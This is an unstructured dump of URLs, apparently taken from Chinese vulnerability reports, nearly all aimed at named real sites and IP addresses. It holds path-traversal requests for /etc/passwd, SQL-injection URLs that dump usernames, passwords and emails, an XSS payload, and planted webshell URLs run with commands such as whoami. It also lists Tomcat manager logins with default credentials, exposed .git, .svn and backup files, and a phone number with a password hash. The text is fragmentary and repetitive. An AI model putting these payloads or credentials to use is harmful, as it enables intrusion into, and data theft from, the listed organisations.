http://**.**.**.**/opensoft.asp?id=25&url=1 
http://**.**.**.**/opensoft.asp?id=16&url=1 http://**.**.**.**/opensoft.asp?id=27&url=1 http://**.**.**.**/jjpc/opensoft.asp?id=12&url=1 http://**.**.**.**/opensoft.asp?id=27&url=1 http://**.**.**.**/opensoft.asp?id=3&url=1 http://**.**.**.**/opensoft.asp?id=27&url=1 http://**.**.**.**/opensoft.asp?id=39&url=1 http://**.**.**.**/opensoft.asp?id=63&url=1 http://**.**.**.**/opensoft.asp?id=24&url=1 http://**.**.**.**/opensoft.asp?id=5&url=1 http://**.**.**.**/opensoft.asp?id=83&url=1 http://**.**.**.**/opensoft.asp?id=8&url=1 http://**.**.**.**/opensoft.asp?id=37&url=1 http://**.**.**.**/opensoft.asp?id=29&url=1 http://**.**.**.**/opensoft.asp?id=107&url=1 http://**.**.**.**/rzgs/opensoft.asp?id=&url=1 http://**.**.**.**/opensoft.asp?id=16&url=1 http://**.**.**.**/opensoft.asp?id=56&url=1 http://**.**.**.**/opensoft.asp?id=80&url=1 http://**.**.**.**/opensoft.asp?id=19&url=1 http://**.**.**.**/opensoft.asp?id=&url=1 http://**.**.**.**/opensoft.asp?id=41&url=1 http://**.**.**.**/opensoft.asp?id=16&url=1 http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://www.oppo.com/cn/ URL:http://ams.yundasys.com:11366/hkgl/login.jsp http://42.159.28.165/ http://42.159.28.165/phpmyadmin/ http://ppbt.changba.com/ http://ppbt.changba.com/0xx.php 
http://m.yuntonghua.net//NewInface/Zb/VerifyCode.asp?platform=IPHONE&mobile=13966991737&ver=IphoneV6.5.9&code=1111&pwd=2a96f99b753e1d103d3c44383fffdd6e http://mail.marinacity.cn http://hongyan.cqupt.edu.cn/szzc/maozedong/text.php?t=2&i=188 http://hongyan.cqupt.edu.cn/welcome/2014/admin http://golf.ifeng.com/ http://**.**.**.**/module/upPhoto/wpicMore.action?websiteid=1037&pagenum=1 http://**.**.**.**/module/upPhoto/wpicMore.action?websiteid=1037&pagenum=1 http://**.**.**.**/module/upPhoto/wpicMore.action?websiteid=1037&pagenum=1 http://**.**.**.**/module/upPhoto/wpicMore.action?websiteid=1037&pagenum=1 http://**.**.**.**/module/upPhoto/wpicMore.action?websiteid=1037&pagenum=1 http://**.**.**.**/module/upPhoto/wpicMore.action?websiteid=1037&pagenum=1 http://**.**.**.**/module/upPhoto/wpicMore.action?websiteid=1037&pagenum=1 http://**.**.**.**/module/upPhoto/wpicMore.action?websiteid=1037&pagenum=1 http://**.**.**.**/module/upPhoto/wpicMore.action?websiteid=1037&pagenum=1 http://**.**.**.**/module/upPhoto/wpicMore.action?websiteid=1037&pagenum=1 http://shop.sennheiser.com.cn/Sale/OrderOK.aspx?SOSysNo=87419 http://mail.qdgxjt.com/webmail/login9.php http://interface.dalingjie.com/ http://vr0.6.cn/../../../../../../../../../etc/passwd http://r.6.cn/../../../../../../../../../etc/passwd ftpuser:x:504:505::/mnt/r:/usr/local/scponly/sbin/scponlyc http://v.6.cn/logins.php?next_action=-- url:http://61.153.204.40:8080/manager/html user:admin 
https://p2p.edai.com/?code&p=add&q=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ http://amall.chinac.com/amall_backend_web/admin_toLogin.action user:admin pass:admin http://sxxy.zjer.cn/info_column.php?id=10&f=%BB%F1%BD%B1%C3%FB%B5%A5 http://yun.zjer.cn/index.php?r=studio/comment/commentlist&sid=269&id=120370&page=&tp=1* url:http://119.1.100.7:8080/manager/html user:admin http://jxgl.jiajiaoban.com/admin http://www.izuche.com/ http://www.gkong.com/webcast/SearchWebcast.aspx?key=88952634 http://www.gkong.com/products/pro_del.asp?id= http://yimin.edai.com/intro.php?id=【注入点】 lear:both http://219.232.200.34/pxwebapp/login.jsp http://219.232.200.34/is2/zecmd.jsp http://219.232.200.34/chopper/chopper.jsp http://survey.news.sina.com.cn/list_search.php?channel_id=1&order=hot&page=2 http://newsport.gewara.com/ http://www.longfeng.com/findpw.html http://tc.homelink.com.cn/Superagent/Superagent00.aspx http://sjupdate.sj.91.com的数据包 http://bcs.91.com/rbreszy/iphone/soft/2015/7/8/a6b9762e03134db881733ea338430ccd/com.youku.YouKu_4.6_20150706_635719609477538660.ipa","size":"","versionName":"5.0.5","versionCode":"","iconUrl":"","updateContent":"1 http://sjupdate.sj.91.com的数据包进行修改,改后的值为 http://sjupdate.sj.91.com/user.ashx?chl=jZg3GleBqu%2Fa2oWvpfPBLecjfojj9X%2BH&nt=10&versionName=5.0.5&osv=7.0.4&versionType=ipa&imei=6d8790a886e6a1edd8699f125c4954f86b39e4c5&dm=iPhone4,1&sv=5.0.5&act=5&productId=2&cuid=15c7c7af83f37a6d38a8d6169b23130716b3035d&pid=2&mt=1 http://bcs.91.com/rbreszy/iphone/soft/2015/7/8/a6b9762e03134db881733ea338430ccd/com.youku.YouKu_4.6_20150706_635719609477538660.ipa","size":"","versionName":"5.0.5","versionCode":"","iconUrl":"","updateContent":"1 https://www.exploit-db.com/exploits/37423/ http://plant.life.tsinghua.edu.cn/ http://www.honhaicargo.com.tw/pages/honhai/news_main.aspx?ID=1257&tv=0101 http://c.rednet.cn/bm/app/appfunction.asp?app_txt=app_info http://zzb.sdau.edu.cn/wsdx/ 
http://www.jswst.gov.cn/gb/jsswst/sphywszb/index.html http://58.213.112.250:65493/genmedia http://58.213.112.250:65493/genmedia/frmSearchResult.aspx?searchkey= ip:121.10.245.222 http://219.142.62.196:8080/rone/SignOnServlet http://219.142.62.196:8080/is/cmd.jsp http://hd.rising.com.cn/BussinesStation/info.aspx?id=16 http://122.193.9.82/ http://job.wjrcb.com/showImg.do?filename=/etc/hosts http://job.wjrcb.com/showImg.do?filename=/home/zxzp/.profile http://61.178.183.225:8000/general/index.aspx http://xxx/xxx.html http:/xxx.com/1.php http://my.letv.com/crossdomain.xml http://**.**.**.**/list.php?cid=1 http://www.nesc.cn/db.zip http://210.22.8.98/login.action https://mail.youku.com http://1.xingruan.zto.cn或http://gps.zto.cn,中通全国车辆GPS管理平台,存在弱口令,登陆进去能够对中通所有车辆进行实时监控,查看历史轨迹、运输业务、车务管理、基础信息(包含全部司机的联系方式)和报表中心等敏感信息。 http://**.**.**/_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**//_data/index_LOGIN.aspx_ http://**.**.**/xsweb/_data/index_LOGIN.aspx_ http://**.**.**/xsweb/_data/index_LOGIN.aspx_ http://**.**.**/xsweb/_data/index_LOGIN.aspx_ http://**.**.**/xsweb/_data/index_LOGIN.aspx_ http://**.**.**/xsweb/_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb/_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ 
http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://2015.cert.org.cn/ http://www.zgfcc.com/zhonggang/DengLu.aspx http://www.zgfcc.com/system/Login.aspx http://www.fxiaoke.com//H/DF/Get/201507_08_cabd0647-cc5a-48ee-9893-0077d5962262.html http://www.367edu.com/?a=web.index&uid=8890 http://continental.hiall.com.cn/c.php http://www1.scuec.edu.cn/stu/xyh2010/view.php?id=71 http://www.gqsj.cc/www/news/list.php?cid=8&cidz=9 http://www.gqsj.cc/www/news/list.php?cid=8&cidz=9%27%20and%20%271%27%20=%20%271 http://www.gqsj.cc/www/news/list.php?cid=8&cidz=9%27%20and%20%271%27%20=%20%272 http://www.gqsj.cc/www/news/list.php?cid=8&cidz=9 http://o2o.189.cn:9080/prize/prizeCenter.action http://123.125.207.148 http://123.125.207.148/invoker/JMXInvokerServlet http://123.125.207.148/is/cmd.jsp?pwd=023&cmd=ipconfig http://122.225.117.132:9014/QFKD-NETWORK-QUERY/management/netWorkQuery/getNetworkByPagination?netWorkNum=336&pageNumber=2 http://mail.cnplhd.com.cn/ http://219.141.231.197:8080/suzhou/ http://219.141.231.197:8080/AllFactory/ http://219.141.231.197:8080/AbroadFactory/ http://career-whrc.huawei.com/pages/activity_details.php?activity_id=70 http://www.51testing.com/batch.common.php?action=modelquote&cid=1&name=spacecomments http://www.51testing.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20UNION%20SELECT%201,2,3,4,5,group_concat%28username,0x7c,password,0x7c,email%29,7,8,9,10,11,12%20from%20ucenter.uc_members%20where%20uid=1%23 http://www.51testing.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20UNION%20SELECT%201,2,3,4,5,group_concat%28username,0x7c,password,0x7c,email%29,7,8,9,10,11,12%20from%20ucenter.uc_members%23 http://blog.ce.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments http://info.17ugo.com/page.php?act=upviews&id=3315%27 http://www.sunlands.com/category/ajaxWebCategory.htm http://pass.hujiang.com/forgot_password/### 
http://pass.hujiang.com/forgot_password/step2/#### http://www.onekj.cn/wwwroot.zip http://physics.whu.edu.cn/cxpan/guestbook/index.asp http://yun.zjer.cn/index.php?id=*&r=studio/class/info&sid=163 http://oa.glsc.com.cn:10040/wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9QJ_89PTUFP_SEv2CdEVFALCPJr8!/ http://jyzx.sjys.cn/shjyzx/newsShow.do?id=e063f9b4-e4c3-420c-bb20-3418b291e181 http://www.bestsonny.com/ http://www.bestsonny.com/data/1.php http://42.62.39.206/wap/ph2?mo=&cm=M3140060&site=0&psortid=1%27 http://42.62.39.206/wap/ph2?mo=&cm=M3140060&site=0&psortid=1 http://218.5.72.107:8080/* ip:59.151.119.11 http://www.lnredcross.org.cn/web/announce.asp?id=168 http://www.hdxjj.gov.cn/hdxjj.zip Google:inurl:search/doSearch.html http://passport.zcool.com.cn/verifyEmail.do?name=86657550@qq.com&appId=1006 http://passport.zcool.com.cn/verifyEmail.do?name=86657550@qq.com&appId=1006 http://gz.kmwsrc.com.cn/Login.aspx http://wb.kmwsrc.com.cn/Exam/AdminLogin.aspx http://2015.kmwsrc.com.cn/Exam/AdminLogin.aspx http://qingdapost.com/qingdapost.rar http://www.2144.cn/girls/ajaxGetFalls/?byMonth=0&cid=1&page=1&pageSize=1&t=0.09775325423106551 http://wap.he.ct10000.com/wap_heb/login.jsp输入受害者手机号,选择随机码登陆 http://mail.wfq.gov.cn/webmail/login.php?Cmd=login http://mail.totalfitness.com.cn/webmail/login.php?Cmd=login http://mail.qtc.org.cn/webmail/login.php?Cmd=login http://mail.yphb.com.cn/webmail/login.php?Cmd=login http://mail.power-ring.cn/webmail/login.php?Cmd=login http://www.cbcmo.com/3.asp http://www.vbill.cn/mss/SafePwd/safe_rese_pwd.htm http://www.vbill.cn/mss/login/loginOut.htm?lgUrl= http://www.vbill.cn/mss/SafePwd/safe_rese_pwd3.htm?type=pwdMsg&uuid=aec1c557e4f445d59a3c91fbac8aecfe http://www.newsman.sdu.edu.cn/index_reader.aspx?paperType=sddxb http://home.sdu.edu.cn/cms/login.php http://sdgx.edu.cn/cms/login.php http://www.fdyjd.sdu.edu.cn/cms/login.php http://dev.ucms.sudiyi.cn/admin/ http://www.ircit.cn/discuz/ http://124.115.170.123/template/login.xhtml 
http://it365.yesky.com/ http://system.greentree.com.cn:8070/userin.aspx http://szgyj.qingdao.gov.cn/admin/main.aspx http://www.bilfinance.com/.git/config http://**.**.**.**/admin/school/SchoolManger.aspx http://**.**.**.**/admin/school/SchoolManger.aspx http://www.ynzjz.com/SysManage/InfoManage/MetaData/ http://www.ynzjz.com/SysManage/InfoManage/MetaData/FrmMetaDictList.aspx http://180.166.152.9/login http://202.136.60.58:7010/index_reader.aspx?paperType=sdjhb http://www.news.sdu.edu.cn一样的。。。都是山东大学的校报,http://www.news.sdu.edu.cn这个同样存在注入 http://oa.meteni.com/weaver/weaver.email.FileDownloadLocation?fileid=46&download=1 http://oa.meteni.com/weaver/weaver.file.filedownload?fileid=1 http://oa.meteni.com/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://oa.meteni.com/login/Login.jsp?logintype=1 http://www.adream.org/job_show.php?type_id=1&jobid=167 http://www.adream.org/ckfinder/ckfinder.html?action=js&func=SetFileField&data=xPicture&thumbFunc=ShowThumbnails&start=Images.asp%3A%2F%3A0 http://222.222.24.85:8585/xxcx1.aspx http://www.rcc086.com/admin/jsp/toEditAdminWithInfo.action?adminId=4 http://202.105.215.70:80/invoker/JMXInvokerServlet http://www.sx12348.cn/web/login.aspx http://terweb.cn/xly/81/show.asp?newid=140 http://terweb.cn/xly/xlyadmin/Shop_Login.htm http://61.141.236.33/ http://zone.wooyun.org/content/19358 url:http://124.164.247.149:8081/manager/html user:admin pass:123456 site:fx.vpclub.cn,可以看到大量订单信息: http://124.207.155.214:8080/ http://124.207.155.214:8080/系统,还未登录的时候,你会发现这样一个请求 http://124.207.155.214:8080/execSql.action http://124.207.155.214:8080 http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx 
http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**//DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**//DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**:8030/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**//DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**//DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**:8030/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://www.wangdaicaifu.com/Member/common/forget.html http://www.95559wsy.com/ http://www.95533ilci.com http://www.95533ilci.com/xiongdi88.asp http://wooyun.org/bugs/wooyun-2015-0120426 url:http://183.213.191.15:8081/manager/html user:admin pass:admin http://oa.cqccn.com/ http://**.**.**/wechat/ http://**.**.**/ http://192.168.28.237:8080/UserCenter/login.action http://192.168.21.1:8080/ http://ask.m.xoyo.com/config.php http://**.**.**/_ 
http://**.**.**/newsDetail.aspxid=13760_ http://passport.fh21.com.cn/public/retrievepassword http://www.vvcity.com/cn/item_info.php?source=yahooshopping&id=lifeessence_bathsalts-sample-1&categoryid=13538 http://wenku.baidu.com/link?url=Z00oRrMllBUR45Y1ZykKqePV9Sh0MLosTAtHYDP54KeSnj9VgSWhTjDEyhUIuFm1bZTB0NoRSDLPp4kNtk8sChk0mFrDHMJta6SSZuVAQWW http://117.34.66.204:8003/login.php http://cser.nju.edu.cn/admin/set_identity.php http://cser.nju.edu.cn/admin/info_detail.php?sid=1 http://agent.leadsec.com.cn/loginout.htm http://www.yijitongoa.com:9090/yjtoa/p/login.html www.yijitongoa.com:9090/yjtoa/s/custs/3/depts/0/users,修改custs后面参数,即可遍历所有企业信息 http://www.wooyun.org/bugs/wooyun-2015-0125516系统源码相同,均属于北京市粮食局,但又不同ip的同一套系统。 http://210.75.218.118:8080/grm http://210.75.218.118:8080/grm/core/ckeditor/cKEditorUpload!downLoadImg.action?imgPatch=/../../../../../../etc/passwd http://mdsp.avazutracking.net/.svn/entries http://cggc.avazuinc.com/.svn/entries http://mdsp.avazutracking.net/home/.svn/entries http://bi.avazu.net/.svn/entries http://mdsp.avazutracking.net/payment/paypal/.svn/entries http://bi.avazu.net/cron/phpinfo.php http://bi.avazu.net/phpinfo.php http://120.236.250.5/肇庆市社会保障卡电子相片传输系统 http://106.39.17.117:8088 User:admin Pass:123456 http://125.91.3.11/login.aspx http://baidu.hexun.com/report/ifread.php?t=1&id=617695 http://www.taiheinfo.net:8181/spam/system/index.action http://mail.dgzq.com.cn:8181/spam/system/index.action http://mail.sdhsg.com:8181/spam/system/index.action http://mail.bsu.edu.cn:8181/spam/system/index.action http://pop3.sju.js.cn:8181/spam/system/index.action http://mail.hgnu.edu.cn:8181/spam/system/index.action http://mail.zzu.edu.cn:8181/spam/system/index.action http://mail.njmetro.com.cn:8181/spam/system/index.action ip:61.146.178.37 http://msg.mooc.chaoxing.com/userObj.shtml?uid=1 www.xkkxkk.com是一家专门从事贷款的网络平台,此战存在SQL注入 http://www.xkkxkk.com/newlist.php?id=253 www.xkkxkk.com用户名及密码,登录后台 http://www.xkkxkk.com/admin/check_login.php 
http://mybbs.coolyun.com/ http://mybbs.coolyun.com/config/.config_global.php.swp bbs.coolpad.com/versions/v2.0.18/config/config_global.phputf-8 http://sms.999.com.cn http://218.65.95.151:8080/) http://218.65.95.151:8080/default.aspx http://113.128.254.170:8078/Login.aspx http://58.220.223.212:8071/login.asp http://119.60.2.37:2340/login.aspx http://www.gdems.com/dshkweb/login.do http://www.haoshouyi.com/index/project/detail/id/747%20%29%20%20or%20updatexml%280,concat%280xa,user%28%29%29,0%29%23%27 http://pm.weaver.cn:9085 http://pm.weaver.cn:9085/ServiceAction/com.eweaver.workflow.request.servlet.RequestlogAction?action=getrelog&requestid=402880484c2a7512014e52de46894dc5 http://www.wandacinemas.com/search/search.jsp www.wandacinemas.com http://www.hajz.cn/sms/aspx/SmsSendInfor.aspx?ID=3 http://www.hajz.cn/sms/aspx/Login.aspx http://eltest.midea.com.cn/servlet/qdbAction?cmd=start&stylesheet=login.xsl,如图所示: http://www.meipai.com http://**.**.**.**:8000/opac/index.jsp http://**.**.**.**/opac/index.jsp http://**.**.**.**:8090/opac/index.jsp http://**.**.**.**:8000/opac/index.jsp http://**.**.**.**:8070/opac/index.jsp http://www.wooyun.org/bugs/wooyun-2015-0125421/trace/7887c38e9dd625d5f38f34b17e8e9633作忽略处理。 http://111.206.37.252/WEB-INF/classes/applicationContext.muses.se.api.xml http://www.szspeed56.cn:9090/ http://www.sbr-info.com/做得中规中矩,还挺好看的。 http://www.sbr-info.com/list.php?xid=7&cid=34&vid=71'这个没什么用但是可以爆出路径。 http://www.sbr-info.com/admin/focusimg.php http://oa.china-online.com.cn http://oa.china-online.com.cn/C6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=123 http://oa.china-online.com.cn/C6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=123 http://111.202.33.107:8080/mbp/login.jsp http://111.202.33.107:8080/is/cmd.jsp?pwd=023&cmd=whoami http://www.i-astv.com http://imall.kesion.com http://www.hfgxrc.com/dj/partylist.aspx?type= http://nc.leyou.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction 
http://open.189.cn/index.php?a=index&c=viewallability&m=api&id=3413 http://oa.china-online.com.cn http://oa.china-online.com.cn/C6/Jhsoft.Web.login/NewView.aspx?ID=1080 http://oa.china-online.com.cn/C6/Jhsoft.Web.login/NewView.aspx?ID=1080 http://www.etonmobile.com/ http://dm.zj189.cn http://baoliao.btvtech.com http://124.239.213.230/Login?ReturnUrl=%2f http://124.239.213.230 https://oa.ebinf.com/oa/enter/login.do http://sszj.wh.gov.cn/phpmyadmin http://www.jinher.com/ http://demos.jh0101.com/C6/Jhsoft.Web.login/NewView.aspx?ID=1 http://demos.jh0101.com/C6/Jhsoft.Web.login/NewView.aspx?ID=1 http://hetaogroup.com/C6/Jhsoft.Web.login/NewView.aspx?ID=1 http://oa.9500.cn/C6/Jhsoft.Web.login/NewView.aspx?ID=1 http://124.172.168.33/SystemLogin.aspx http://124.172.168.33 http://college.weimob.com/kecheng.php?aid=92 http://dacheng.weimob.com/ http://211.151.175.22/Admin/Public/login.html http://b2a.airkunming.com/b2a/agentorder/flightSearch.do?operate=teamOrderPaySuccess&orderNO=FX201504126391111 http://www.renrentou.com/ http://www.renrentou.com/project/list?keyword=* http://120.24.220.113:8080/ http://120.24.220.113:8080/userAction!userLogin.do http://fotoplace.cc/admin/src/notify/notifies.php# http://fotoplace.cc/admin/ http://fotoplace.cc/admin/src/notify/notifies.php http://**.**.**.**/areaAction.do http://**.**.**.**:8080/areaAction.do http://**.**.**.**/Manage/pnr_detail.aspx?id=1 http://**.**.**.**/Manage/pnr_detail.aspx?id=1 http://**.**.**.**/Manage/pnr_detail.aspx?id=1 http://**.**.**.**/Manage/pnr_detail.aspx?id=1 http://**.**.**.**//Manage/pnr_detail.aspx?id=1 http://store.tdxinfo.com/ http://in.ebinf.com/bbs/ http://www.jinglingshu.org/?p=7901 http://www.smedi.com/engineering/design.jsp?cid=11 http://61.191.47.101:80/frame/InitBindDrop?type=2&father=11 www.54doctor.net http://www.54doctor.net/News/Main?siteId=6 http://www.jst-hosp.com.cn/ImageUpLoad/Index?ImageId=AvatarImageUrl http://www.zjuch.cn/ImageUpLoad/Index?ImageId=AvatarImageUrl 
http://www.bjyah.com/ImageUpLoad/Index?ImageId=AvatarImageUrl http://www.pkuh6.cn/ImageUpLoad/Index?ImageId=AvatarImageUrl http://wzcg.chinacoal.com:7002/b2b/web/two/indexinfoAction.do?actionType=showFlashContent&xh=14-0 http://www.chinaair365.com/distributor/flightreserve/ordersearch/orderinfo.aspx?temp=1397625790298&orderno=404152006001 https://s.bt.gg/#newwindow=1&q=Sponsoring+Registrar:+%E5%8E%A6%E9%97%A8%E7%BA%B3%E7%BD%91%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 http://www.nwabc.cn http://www.licdai.com/ www.licdai.com http://www.licdai.com http://vip.epeaksport.com/XP001-MemberDatum/Initial.html http://image.epeaksport.com/image/Member/20150709/142017/Header/one.php http://www.yonyougov.com/index.php?m=admin&c=index&a=login&pc_hash= http://www.yonyougov.com/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://rsc.cqupt.edu.cn/list.aspx?id=20 admin:236***0012 http://dns.22.cn/ http://jyzd.sy.e21.cn/include/conn.inc1 agent.nawang.cn/order/order/settlement/menu1/menu2/menu2/0/menu3/member_id/order_str/我是注入点/source/wfk agent.nawang.cn/order/order/settlement http://www.jneq.gov.cn/newsmore1.asp?lb1=1&lb2=1 http://www.jneq.gov.cn/login.asp http://mail.ww.gov.cn/swfupload/swfupload.swf http://wooyun.org/bugs/wooyun-2010-05422 http://mail.mofcom.gov.cn//swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28/xss/%29}}// http://www.wooyun.org/bugs/wooyun-2015-0124765/trace/819dfa891fcc2ab6e1ff032002758465 http://www.aokang.cn/member/usershow_list.aspx http://**.**.**.**/ http://h.aeonlife.com.cn/ http://h.aeonlife.com.cn/web-console/ http://h.aeonlife.com.cn/jbossass/jbossass.jsp http://h.aeonlife.com.cn/jbossass/jbossass.jsp?ppp=whoami http://58.32.246.97:81/ http://58.32.246.97:81/userweb/include/cache/pushCdrInfo http://58.32.246.97:81/userweb/include/tools/proxyman/ProxyMan.py 
http://mail.yto.net.cn/?loginOp=logout inurl:SkyTechUI http://**.**.**.**:8888/jjmszj/SkyTechUI/tzmszj/webpage/comment_list.jsp?infoid=&tabIndex=-1&programPk= http://ev.apps.cctv.com http://ev.apps.cctv.com/app_ev/program09/program/tvdiaocha/tvfirst.jsp http://ev.apps.cctv.com/console/login/LoginForm.jsp http://e.sunlands.com:8088/back/login!receptionIndex.action http://auto.ynet.com/ http://auto.ynet.com/cgi/newslist.php?dir=101 http://**.**.**.**:89/ http://58.248.253.90/ http://www.szlg.edu.cn/hudong.php?id=3144 http://www.szlg.edu.cn/hudong.php?id=3144 http://m.dianping.com/mjob/new/readFile.action?filename=../../../../../../../../../../etc/hosts http://m.dianping.com/mjob/new/readFile.action?filename=../../../../../../../../../../etc/hosts http://m.dianping.com/mjob/new/readFile.action?filename=../../../../../../../../../../etc/passwd http://116.228.44.9:8889/EasySW/Login.aspx http://116.228.44.9:8889/Login.aspx http://116.228.44.9:8889/EasySW_SS/ http://eservice.95549.cn/eservice/login.action?action=initGetPwd http://219.159.104.153:8080/存在命令执行漏洞 http://59.151.39.85/pre/ http://manage.dec.lzu.cn/StudentPortXML/UIStudentAndLearningAdmin_AJAX.aspx?Url=MakeXMLForStudentBaseInfo&UserName=用户名 http://www.jiathis.com/send/.svn/entries www.haoinvest.com http://ev.apps.cctv.com/app_ev/program09/newsletter/searchEmail.jsp http://ev.apps.cctv.com/app_ev/program09/newsletter/searchEmail.jsp http://ev.apps.cctv.com/app_ev/program09/newsletter/searchEmail.jsp 